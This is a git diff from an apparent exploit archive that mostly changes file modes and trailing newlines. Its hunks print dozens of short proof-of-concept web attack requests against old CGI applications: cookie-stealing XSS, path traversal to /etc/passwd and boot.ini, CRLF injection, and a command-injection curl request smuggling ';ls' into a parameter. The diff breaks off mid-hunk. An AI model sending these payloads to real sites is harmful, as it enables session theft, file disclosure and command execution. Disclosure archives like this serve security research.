at end of file diff --git a/platforms/cgi/webapps/26864.txt b/platforms/cgi/webapps/26864.txt old mode 100755 new mode 100644 index b6d25195e..a90b6a7a9 --- a/platforms/cgi/webapps/26864.txt +++ b/platforms/cgi/webapps/26864.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th This issue affects version 2.14.1; other versions may also be vulnerable. -http://www.example.com/webglimpse.cgi?query=&ID=1[XSS] \ No newline at end of file +http://www.example.com/webglimpse.cgi?query=&ID=1[XSS] \ No newline at end of file diff --git a/platforms/cgi/webapps/26865.txt b/platforms/cgi/webapps/26865.txt old mode 100755 new mode 100644 index b47f81213..9ccf1f4d0 --- a/platforms/cgi/webapps/26865.txt +++ b/platforms/cgi/webapps/26865.txt @@ -8,4 +8,4 @@ These issues affect version 3.04; earlier versions may also be vulnerable. http://www.example.com/perl/webcal.cgi?function=<script>alert(document.cookie)</script>&cal=public http://www.example.com/perl/webcal.cgi?function=webyear&cal=public&year=<script>alert(document.cookie)</script> -http://www.example.com/perl/webcal.cgi?function=webday&cal=public&date=<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/perl/webcal.cgi?function=webday&cal=public&date=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/26914.txt b/platforms/cgi/webapps/26914.txt old mode 100755 new mode 100644 index 90f4ef284..94a596f19 --- a/platforms/cgi/webapps/26914.txt +++ b/platforms/cgi/webapps/26914.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to retrieve arbitrary files in the context of Netpublish Server 7 is vulnerable; other versions may also be affected. -http://www.example.com/server.np?base&site=XXXintra&catalog=catalog&template=../../../../../../../../../boot.ini \ No newline at end of file +http://www.example.com/server.np?base&site=XXXintra&catalog=catalog&template=../../../../../../../../../boot.ini \ No newline at end of file diff --git a/platforms/cgi/webapps/26917.txt b/platforms/cgi/webapps/26917.txt old mode 100755 new mode 100644 index f8bb8d7ae..f19ca4be0 --- a/platforms/cgi/webapps/26917.txt +++ b/platforms/cgi/webapps/26917.txt @@ -6,4 +6,4 @@ Attacker-supplied HTML and script code would be executed in the context of the a Example HTML exploit code has been provided: -<span style="background:url('javas\cript:(function x(){alert("boo")})();');">test</span> \ No newline at end of file +<span style="background:url('javas\cript:(function x(){alert("boo")})();');">test</span> \ No newline at end of file diff --git a/platforms/cgi/webapps/26933.txt b/platforms/cgi/webapps/26933.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/26937.txt b/platforms/cgi/webapps/26937.txt old mode 100755 new mode 100644 index f27a78e3e..d172e7bf2 --- a/platforms/cgi/webapps/26937.txt +++ b/platforms/cgi/webapps/26937.txt @@ -13,4 +13,4 @@ http://www.example.com/index.tpl?iid=l3a1b3&#9001;=1&iid2=3&r=[XSS] http://www.example.com/index.tpl?iid=l093a1b1&#9001;=1&iid2=[iid2]&r=[r]&cart=[XSS] http://www.example.com/index.tpl?iid=l093a1b1&#9001;=1&iid2=[iid2]&r=[r]&cart=11351542306899006&str=[XSS] http://www.example.com/index.tpl?a=search_adv&cart=11351544339319101&#9001;=1&iid=13&nf=[XSS] -http://www.example.com/index.tpl?a=[XSS] \ No newline at end of file +http://www.example.com/index.tpl?a=[XSS] \ No newline at end of file diff --git a/platforms/cgi/webapps/27021.txt b/platforms/cgi/webapps/27021.txt old mode 100755 new mode 100644 index 8900e5501..efceb8ac0 --- a/platforms/cgi/webapps/27021.txt +++ b/platforms/cgi/webapps/27021.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Discus Professional 3.10 and Discus Freeware 3.10 are vulnerable; other versions may also be affected. -http://www.example.com/cgi-bin/discus/board-post.cgi?HTTP_REFERER=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&preview=1&message=&username=&passwd=&active_links=1&active_links_a=1 \ No newline at end of file +http://www.example.com/cgi-bin/discus/board-post.cgi?HTTP_REFERER=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&preview=1&message=&username=&passwd=&active_links=1&active_links_a=1 \ No newline at end of file diff --git a/platforms/cgi/webapps/27061.txt b/platforms/cgi/webapps/27061.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27062.txt b/platforms/cgi/webapps/27062.txt old mode 100755 new mode 100644 index 59be97d97..ac5bc90bf --- a/platforms/cgi/webapps/27062.txt +++ b/platforms/cgi/webapps/27062.txt @@ -16,4 +16,4 @@ To disclose the internal IP address: https://www.example.com/hc/hc?d=mes&x=20433&ntb=[numericParam] -Where the ntb parameter is supplied a numeric value instead of a string value. The internal IP address of the server may be found in a cookie. \ No newline at end of file +Where the ntb parameter is supplied a numeric value instead of a string value. The internal IP address of the server may be found in a cookie. \ No newline at end of file diff --git a/platforms/cgi/webapps/27081.txt b/platforms/cgi/webapps/27081.txt old mode 100755 new mode 100644 index a7ca2221d..947927e8c --- a/platforms/cgi/webapps/27081.txt +++ b/platforms/cgi/webapps/27081.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th Version 3.67 is vulnerable to this issue; prior versions may also be affected. -http://www.example.com/item.pl?item=<script>alert("XSS")</script> \ No newline at end of file +http://www.example.com/item.pl?item=<script>alert("XSS")</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/27088.txt b/platforms/cgi/webapps/27088.txt old mode 100755 new mode 100644 index 3c8f0628d..77cbf2e67 --- a/platforms/cgi/webapps/27088.txt +++ b/platforms/cgi/webapps/27088.txt @@ -8,4 +8,4 @@ These issues may be related to those discussed in BID 4565 and BID 4023 (Faq-O-M http://www.example.com/fom.cgi?cmd=recent&file=1&showLastModified=show&_submit=Show+documents&_duration=[code] http://www.example.com/fom.cgi?file=[code]&showLastModified=show -http://www.example.com/fom.cgi?_insert=answer&cmd=[code]&file=1 \ No newline at end of file +http://www.example.com/fom.cgi?_insert=answer&cmd=[code]&file=1 \ No newline at end of file diff --git a/platforms/cgi/webapps/27091.txt b/platforms/cgi/webapps/27091.txt old mode 100755 new mode 100644 index 07a2e9659..e95128a06 --- a/platforms/cgi/webapps/27091.txt +++ b/platforms/cgi/webapps/27091.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th Version 3.67 is vulnerable to this issue; prior versions may also be affected. -http://www.example.com/cgi-local/auktion/itemlist.pl?category=<script>alert("XSS")</script> \ No newline at end of file +http://www.example.com/cgi-local/auktion/itemlist.pl?category=<script>alert("XSS")</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/27115.txt b/platforms/cgi/webapps/27115.txt old mode 100755 new mode 100644 index 92e3be954..51c0fd0ef --- a/platforms/cgi/webapps/27115.txt +++ b/platforms/cgi/webapps/27115.txt @@ -4,4 +4,4 @@ MailSite is prone to a cross-site scripting vulnerability. This issue is due to An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com:90/CGI-BIN/WCONSOLE.DLL?%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com:90/CGI-BIN/WCONSOLE.DLL?%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/cgi/webapps/27141.txt b/platforms/cgi/webapps/27141.txt old mode 100755 new mode 100644 index ced4ddd74..31a8f0592 --- a/platforms/cgi/webapps/27141.txt +++ b/platforms/cgi/webapps/27141.txt @@ -6,4 +6,4 @@ An attacker can exploit these vulnerabilities to retrieve arbitrary files from t http://www.example.com/cgi-bin/e-cms/vis/vis.pl?s=001&p=../../../../etc/passwd%00 -http://www.example.com/cgi-bin/e-cms/vis/vis.pl?s=../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/cgi-bin/e-cms/vis/vis.pl?s=../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/cgi/webapps/27163.txt b/platforms/cgi/webapps/27163.txt old mode 100755 new mode 100644 index c3e258383..113d7159a --- a/platforms/cgi/webapps/27163.txt +++ b/platforms/cgi/webapps/27163.txt @@ -8,4 +8,4 @@ Note that the attacker must be an authenticated user to exploit this vulnerabili Versions 5.1.0.10 and 6.0.0 are vulnerable; other versions may also be affected. -http://www.example.com/pkmslogout?filename=../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/pkmslogout?filename=../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/cgi/webapps/27451.txt b/platforms/cgi/webapps/27451.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27464.txt b/platforms/cgi/webapps/27464.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27488.txt b/platforms/cgi/webapps/27488.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27561.txt b/platforms/cgi/webapps/27561.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27562.txt b/platforms/cgi/webapps/27562.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27583.txt b/platforms/cgi/webapps/27583.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27594.txt b/platforms/cgi/webapps/27594.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27620.txt b/platforms/cgi/webapps/27620.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27631.txt b/platforms/cgi/webapps/27631.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27672.txt b/platforms/cgi/webapps/27672.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27679.txt b/platforms/cgi/webapps/27679.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27680.txt b/platforms/cgi/webapps/27680.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27681.txt b/platforms/cgi/webapps/27681.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27682.txt b/platforms/cgi/webapps/27682.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27683.txt b/platforms/cgi/webapps/27683.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27685.txt b/platforms/cgi/webapps/27685.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27686.txt b/platforms/cgi/webapps/27686.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27689.txt b/platforms/cgi/webapps/27689.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27690.txt b/platforms/cgi/webapps/27690.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27691.txt b/platforms/cgi/webapps/27691.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27694.txt b/platforms/cgi/webapps/27694.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27695.txt b/platforms/cgi/webapps/27695.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27696.txt b/platforms/cgi/webapps/27696.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27697.txt b/platforms/cgi/webapps/27697.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27712.txt b/platforms/cgi/webapps/27712.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27728.txt b/platforms/cgi/webapps/27728.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27761.txt b/platforms/cgi/webapps/27761.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/27895.txt b/platforms/cgi/webapps/27895.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/28321.pl b/platforms/cgi/webapps/28321.pl index 554647a87..e66ca6c71 100755 --- a/platforms/cgi/webapps/28321.pl +++ b/platforms/cgi/webapps/28321.pl @@ -47,5 +47,4 @@ chmod -R 777 /mail/tmp/ ## Create smb backup mount point /bin/mkdir -p /mnt/smb/ -chmod 777 /mnt/smb/ - \ No newline at end of file +chmod 777 /mnt/smb/ \ No newline at end of file diff --git a/platforms/cgi/webapps/28514.txt b/platforms/cgi/webapps/28514.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/28570.txt b/platforms/cgi/webapps/28570.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/29221.txt b/platforms/cgi/webapps/29221.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/29275.txt b/platforms/cgi/webapps/29275.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/29390.txt b/platforms/cgi/webapps/29390.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/29391.txt b/platforms/cgi/webapps/29391.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/29392.txt b/platforms/cgi/webapps/29392.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/29393.txt b/platforms/cgi/webapps/29393.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/29394.txt b/platforms/cgi/webapps/29394.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/29395.txt b/platforms/cgi/webapps/29395.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/29396.txt b/platforms/cgi/webapps/29396.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/29623.txt b/platforms/cgi/webapps/29623.txt old mode 100755 new mode 100644 index 20b86cb54..b463a65e3 --- a/platforms/cgi/webapps/29623.txt +++ b/platforms/cgi/webapps/29623.txt @@ -6,4 +6,4 @@ Successful attacks must exploit this weakness in conjunction with a latent cross Attackers may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow attackers to access the contents of the Google Desktop search index or potentially to execute arbitrary code. -http://127.0.0.1/path/search?q=%22%3E%3Cscript%3Ealert%28%27bl4ck%27%29%3C%2Fscript%3E \ No newline at end of file +http://127.0.0.1/path/search?q=%22%3E%3Cscript%3Ealert%28%27bl4ck%27%29%3C%2Fscript%3E \ No newline at end of file diff --git a/platforms/cgi/webapps/29761.txt b/platforms/cgi/webapps/29761.txt old mode 100755 new mode 100644 index 7f55a78bd..5fd93a41e --- a/platforms/cgi/webapps/29761.txt +++ b/platforms/cgi/webapps/29761.txt @@ -8,4 +8,4 @@ Note that the authentication-bypass issue affects only SQL-Ledger. These issues affect LedgerSMB prior to 1.1.10 and SQL-Ledger prior to 2.6.27. -http://www.example.com/sql-ledger/am.pl?login=../../../home/user/foo.pl%00&action=add_department \ No newline at end of file +http://www.example.com/sql-ledger/am.pl?login=../../../home/user/foo.pl%00&action=add_department \ No newline at end of file diff --git a/platforms/cgi/webapps/29842.txt b/platforms/cgi/webapps/29842.txt old mode 100755 new mode 100644 index b8cf3038f..e3f88957f --- a/platforms/cgi/webapps/29842.txt +++ b/platforms/cgi/webapps/29842.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to gain unauthorized access to services hoste Versions prior to 1.9.4b and 2.0.2a are vulnerable. -cosign=X\rLOGIN cosign=X 1.2.3.4 username\rREGISTER cosign=X 1.2.3.4 cosign-servicename=Y \ No newline at end of file +cosign=X\rLOGIN cosign=X 1.2.3.4 username\rREGISTER cosign=X 1.2.3.4 cosign-servicename=Y \ No newline at end of file diff --git a/platforms/cgi/webapps/29844.txt b/platforms/cgi/webapps/29844.txt old mode 100755 new mode 100644 index 3d9b8587d..8d14fe164 --- a/platforms/cgi/webapps/29844.txt +++ b/platforms/cgi/webapps/29844.txt @@ -12,8 +12,4 @@ Cookie: cosign=X Content-Type: application/x-www-form-urlencoded Content-Length: N -required=&ref=https%3A%2F%2Fweblogin.example.com%2F&service=cosign-servicename=Y%0DLOGIN cosign=X2 1.2.3.4 username%0DREGISTER cosign=X2 1.2.3.4 cosign-servicename=Y2&login=test&password=pass&passcode=&doLogin=Log+In - - - - \ No newline at end of file +required=&ref=https%3A%2F%2Fweblogin.example.com%2F&service=cosign-servicename=Y%0DLOGIN cosign=X2 1.2.3.4 username%0DREGISTER cosign=X2 1.2.3.4 cosign-servicename=Y2&login=test&password=pass&passcode=&doLogin=Log+In \ No newline at end of file diff --git a/platforms/cgi/webapps/29962.txt b/platforms/cgi/webapps/29962.txt old mode 100755 new mode 100644 index a9ae59efa..9f155b803 --- a/platforms/cgi/webapps/29962.txt +++ b/platforms/cgi/webapps/29962.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects OTRS 2.0.4; other versions may also be affected. -http://www.example.com/server/otre/index/pl?Action=AgentTicketMailbox&Subaction=[xss] \ No newline at end of file +http://www.example.com/server/otre/index/pl?Action=AgentTicketMailbox&Subaction=[xss] \ No newline at end of file diff --git a/platforms/cgi/webapps/30156.txt b/platforms/cgi/webapps/30156.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/30199.txt b/platforms/cgi/webapps/30199.txt old mode 100755 new mode 100644 index 612e44bff..d79b79000 --- a/platforms/cgi/webapps/30199.txt +++ b/platforms/cgi/webapps/30199.txt @@ -4,4 +4,4 @@ WebIf is prone to a local file-include vulnerability because it fails to properl Exploiting this issue may allow an unauthorized user to view files and execute local scripts. -http://www.example.com/webif/webif.cgi?cmd=query&config=conf_2000/config.txt&outconfig=../../../../etc/issue \ No newline at end of file +http://www.example.com/webif/webif.cgi?cmd=query&config=conf_2000/config.txt&outconfig=../../../../etc/issue \ No newline at end of file diff --git a/platforms/cgi/webapps/30260.txt b/platforms/cgi/webapps/30260.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/30263.txt b/platforms/cgi/webapps/30263.txt old mode 100755 new mode 100644 index 126067d78..832ea8dd1 --- a/platforms/cgi/webapps/30263.txt +++ b/platforms/cgi/webapps/30263.txt @@ -4,4 +4,4 @@ Oliver is prone to multiple cross-site scripting vulnerabilities because it fail An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/oliver/gateway/gateway.exe?X_=000f&application=Oliver&displayform=main&updateform="><script>alert("XSS");</script> http://www.example.com/oliver/gateway/gateway.exe?X_=000f&displayform=main"><script>alert("XSS");</script> \ No newline at end of file +http://www.example.com/oliver/gateway/gateway.exe?X_=000f&application=Oliver&displayform=main&updateform="><script>alert("XSS");</script> http://www.example.com/oliver/gateway/gateway.exe?X_=000f&displayform=main"><script>alert("XSS");</script> \ No newline at end of file diff --git a/platforms/cgi/webapps/30440.txt b/platforms/cgi/webapps/30440.txt old mode 100755 new mode 100644 index 9babb6cef..40ec3d684 --- a/platforms/cgi/webapps/30440.txt +++ b/platforms/cgi/webapps/30440.txt @@ -4,4 +4,4 @@ WebEvent is prone to a cross-site scripting vulnerability because the applicatio An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/cgi-bin/webevent/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.example2.com/xss.js%3E%3C/SCRIPT%3E \ No newline at end of file +http://www.example.com/cgi-bin/webevent/webevent.cgi?cmd=%22%3CSCRIPT+SRC=http://www.example2.com/xss.js%3E%3C/SCRIPT%3E \ No newline at end of file diff --git a/platforms/cgi/webapps/30475.txt b/platforms/cgi/webapps/30475.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/30585.txt b/platforms/cgi/webapps/30585.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/30586.txt b/platforms/cgi/webapps/30586.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/30587.txt b/platforms/cgi/webapps/30587.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/30591.txt b/platforms/cgi/webapps/30591.txt old mode 100755 new mode 100644 index de5aac455..411ca0bde --- a/platforms/cgi/webapps/30591.txt +++ b/platforms/cgi/webapps/30591.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to execute arbitrary commands with the privileg Alcatel-Lucent OmniPCX Enterprise R7.1 and prior versions are vulnerable to this issue. -curl -k "https://www.example.com/cgi-bin/masterCGI?ping=nomip&user=;ls\${IFS}-l;" \ No newline at end of file +curl -k "https://www.example.com/cgi-bin/masterCGI?ping=nomip&user=;ls\${IFS}-l;" \ No newline at end of file diff --git a/platforms/cgi/webapps/30597.txt b/platforms/cgi/webapps/30597.txt old mode 100755 new mode 100644 index 3bc2c39a2..16a9c933d --- a/platforms/cgi/webapps/30597.txt +++ b/platforms/cgi/webapps/30597.txt @@ -7,4 +7,4 @@ Exploiting these vulnerabilities may allow an attacker to perform cross-site scr LevelOne WBR3404TX firmware version R1.94p0vTIG is vulnerable; other versions may also be affected. http://www.example.com/cgi-bin/ddns?RC=%40&DG0=x&DP=D&DD=[xss] -http://www.example.com/cgi-bin/ddns?RC=%40&DG0=x&DP=D&DD=&DU=[xss] \ No newline at end of file +http://www.example.com/cgi-bin/ddns?RC=%40&DG0=x&DP=D&DD=&DU=[xss] \ No newline at end of file diff --git a/platforms/cgi/webapps/30598.txt b/platforms/cgi/webapps/30598.txt old mode 100755 new mode 100644 index 7058cf0b7..71cf584db --- a/platforms/cgi/webapps/30598.txt +++ b/platforms/cgi/webapps/30598.txt @@ -9,4 +9,4 @@ The attacker may leverage the information-disclosure issue to obtain potentially Reports indicate that WebBatch 2007D is not affected by the cross-site scripting issue. http://www.example.com/webcgi/webbatch.exe?XSS -http://www.example.com/webcgi/webbatch.exe?PATH/XSS \ No newline at end of file +http://www.example.com/webcgi/webbatch.exe?PATH/XSS \ No newline at end of file diff --git a/platforms/cgi/webapps/30599.txt b/platforms/cgi/webapps/30599.txt old mode 100755 new mode 100644 index dc4501489..d57c86d4d --- a/platforms/cgi/webapps/30599.txt +++ b/platforms/cgi/webapps/30599.txt @@ -8,4 +8,4 @@ The attacker may leverage the information-disclosure issue to obtain potentially Reports indicate that WebBatch 2007D is not affected by the cross-site scripting issue. -http://www.example.com/webcgi/webbatch.exe?dumpinputdata \ No newline at end of file +http://www.example.com/webcgi/webbatch.exe?dumpinputdata \ No newline at end of file diff --git a/platforms/cgi/webapps/30606.txt b/platforms/cgi/webapps/30606.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/30639.txt b/platforms/cgi/webapps/30639.txt old mode 100755 new mode 100644 index 6a2675f33..094498b29 --- a/platforms/cgi/webapps/30639.txt +++ b/platforms/cgi/webapps/30639.txt @@ -9,4 +9,4 @@ This issue affects Cart32 6.3; prior versions are also vulnerable. http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.gif http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.jpg http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.pdf -http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.png \ No newline at end of file +http://www.example.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.png \ No newline at end of file diff --git a/platforms/cgi/webapps/30649.txt b/platforms/cgi/webapps/30649.txt old mode 100755 new mode 100644 index 65f8638d9..ee251d265 --- a/platforms/cgi/webapps/30649.txt +++ b/platforms/cgi/webapps/30649.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br These issues affect DNews 57e1; other versions may also be affected. http://www.example.com/cgi-bin/dnewsweb.exe?cmd=PATH&group=XSS -http://www.example.com /cgi-bin/dnewsweb.exe?utag=XSS \ No newline at end of file +http://www.example.com /cgi-bin/dnewsweb.exe?utag=XSS \ No newline at end of file diff --git a/platforms/cgi/webapps/3065.txt b/platforms/cgi/webapps/3065.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/30661.txt b/platforms/cgi/webapps/30661.txt old mode 100755 new mode 100644 index 9bebf143d..8e075fc0f --- a/platforms/cgi/webapps/30661.txt +++ b/platforms/cgi/webapps/30661.txt @@ -8,4 +8,4 @@ Urchin 5.7.03 is vulnerable to this issue; other versions may also be affected. NOTE: Further reports suggest that this is not a vulnerability, but a documented feature of the application. -http://www.example.com/report.cgi?profile=x&rid=42&prefs=x&n=10&vid=1301&bd=20070703&ed=20070703&dt=4&gtype=5 \ No newline at end of file +http://www.example.com/report.cgi?profile=x&rid=42&prefs=x&n=10&vid=1301&bd=20070703&ed=20070703&dt=4&gtype=5 \ No newline at end of file diff --git a/platforms/cgi/webapps/30759.txt b/platforms/cgi/webapps/30759.txt old mode 100755 new mode 100644 index 1ed99fdbb..9f8fd6a97 --- a/platforms/cgi/webapps/30759.txt +++ b/platforms/cgi/webapps/30759.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects versions prior to Web Gateway 48.1.1. -http://somevtlsweb.net/cgi-bin/vtls/vtls.web.gateway?authority=1&searchtype=subject%22%3E%3Ch1%3E%3Cmarquee%3EXSS%20bug%3C/marquee%3E%3C/h1%3E%3C!--&kind=ns&conf=080104+++++++ \ No newline at end of file +http://somevtlsweb.net/cgi-bin/vtls/vtls.web.gateway?authority=1&searchtype=subject%22%3E%3Ch1%3E%3Cmarquee%3EXSS%20bug%3C/marquee%3E%3C/h1%3E%3C!--&kind=ns&conf=080104+++++++ \ No newline at end of file diff --git a/platforms/cgi/webapps/30770.txt b/platforms/cgi/webapps/30770.txt old mode 100755 new mode 100644 index 4206f8e90..beec7e91d --- a/platforms/cgi/webapps/30770.txt +++ b/platforms/cgi/webapps/30770.txt @@ -5,4 +5,4 @@ AIDA Web is prone to multiple unauthorized access vulnerabilities. An attacker could exploit these issues to obtain potentially sensitive information that could aid in further attacks. http://www.example.com/CGI-Bin/frame.html?Mehr=xxx -http://www.example.com/CGI-Bin/frame.html?Mehr=xxx&SUPER=x \ No newline at end of file +http://www.example.com/CGI-Bin/frame.html?Mehr=xxx&SUPER=x \ No newline at end of file diff --git a/platforms/cgi/webapps/30777.txt b/platforms/cgi/webapps/30777.txt old mode 100755 new mode 100644 index e5bf3193a..30548e2c8 --- a/platforms/cgi/webapps/30777.txt +++ b/platforms/cgi/webapps/30777.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Citrix NetScaler 8.0 build 47.8 is vulnerable; other versions may also be affected. -http://www.example.com/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e \ No newline at end of file +http://www.example.com/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e \ No newline at end of file diff --git a/platforms/cgi/webapps/30795.txt b/platforms/cgi/webapps/30795.txt old mode 100755 new mode 100644 index a29a68fa3..bb3141c03 --- a/platforms/cgi/webapps/30795.txt +++ b/platforms/cgi/webapps/30795.txt @@ -5,4 +5,4 @@ GWExtranet is prone to multiple directory-traversal vulnerabilities because it f An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the webserver process. Information obtained may aid in further attacks. http://www.example.com/gwextranet/scp.dll/sendto?user=calendar+of+events&mid=474020FA.GWEMAIL_DEPOT.SDEPO.100.167656B.1.1B00.1&template=.././../../boot.ini%00 -http://www.example.com/gwextranet/scp.dll/nbfile?user=calendar%20of%20events&format=&mid=46FA2724.GWEMAIL_DEPOT.SDEPO.100.167656B.1.198E.1&folder=Calendar&altcolor=cccccc&template=gwextra&caldays=1&startday=&file=../scp.dll \ No newline at end of file +http://www.example.com/gwextranet/scp.dll/nbfile?user=calendar%20of%20events&format=&mid=46FA2724.GWEMAIL_DEPOT.SDEPO.100.167656B.1.198E.1&folder=Calendar&altcolor=cccccc&template=gwextra&caldays=1&startday=&file=../scp.dll \ No newline at end of file diff --git a/platforms/cgi/webapps/30808.txt b/platforms/cgi/webapps/30808.txt old mode 100755 new mode 100644 index a40d424ac..e5f3b7837 --- a/platforms/cgi/webapps/30808.txt +++ b/platforms/cgi/webapps/30808.txt @@ -9,4 +9,4 @@ GWExtranet 3.0 is affected by these issues; other versions may also be vulnerabl http://www.example.com/GWExtranet/scp.dll/frmonth?filter=<EvilScript> http://www.example.com/GWExtranet/scp.dll/frmonth?user=<EvilScript> http://www.example.com/GWExtranet/scp.dll/frmonth?month=<EvilScript> -http://www.example.com/GWExtranet/scp.dll?user=USERID&template=<EvilScript> \ No newline at end of file +http://www.example.com/GWExtranet/scp.dll?user=USERID&template=<EvilScript> \ No newline at end of file diff --git a/platforms/cgi/webapps/30818.txt b/platforms/cgi/webapps/30818.txt old mode 100755 new mode 100644 index 0ecfc041f..42fe55979 --- a/platforms/cgi/webapps/30818.txt +++ b/platforms/cgi/webapps/30818.txt @@ -6,4 +6,4 @@ Exploiting this issue allows an attacker to execute arbitrary HTML or script cod This issue affects ht://Dig 3.2.0b6; other versions may also be vulnerable. -http://www.example.com/cgi-bin/htsearch?config=&restrict=&exclude=&method=and&format=builtin-long&sort=<script>alert("foo")</script>&words=foo \ No newline at end of file +http://www.example.com/cgi-bin/htsearch?config=&restrict=&exclude=&method=and&format=builtin-long&sort=<script>alert("foo")</script>&words=foo \ No newline at end of file diff --git a/platforms/cgi/webapps/30919.txt b/platforms/cgi/webapps/30919.txt old mode 100755 new mode 100644 index 62d1f1e1e..4f08c9084 --- a/platforms/cgi/webapps/30919.txt +++ b/platforms/cgi/webapps/30919.txt @@ -4,4 +4,4 @@ SiteScape Forum is prone to a command-injection vulnerability because it fails t Attackers can exploit this issue to execute arbitrary commands in the context of the webserver process. Successful exploits could compromise the application and possibly the underlying system. -http://www.example.com/forum/support/dispatch.cgi/0;command \ No newline at end of file +http://www.example.com/forum/support/dispatch.cgi/0;command \ No newline at end of file diff --git a/platforms/cgi/webapps/30975.txt b/platforms/cgi/webapps/30975.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/webapps/31025.txt b/platforms/cgi/webapps/31025.txt old mode 100755 new mode 100644 index af080eafe..d99b19046 --- a/platforms/cgi/webapps/31025.txt +++ 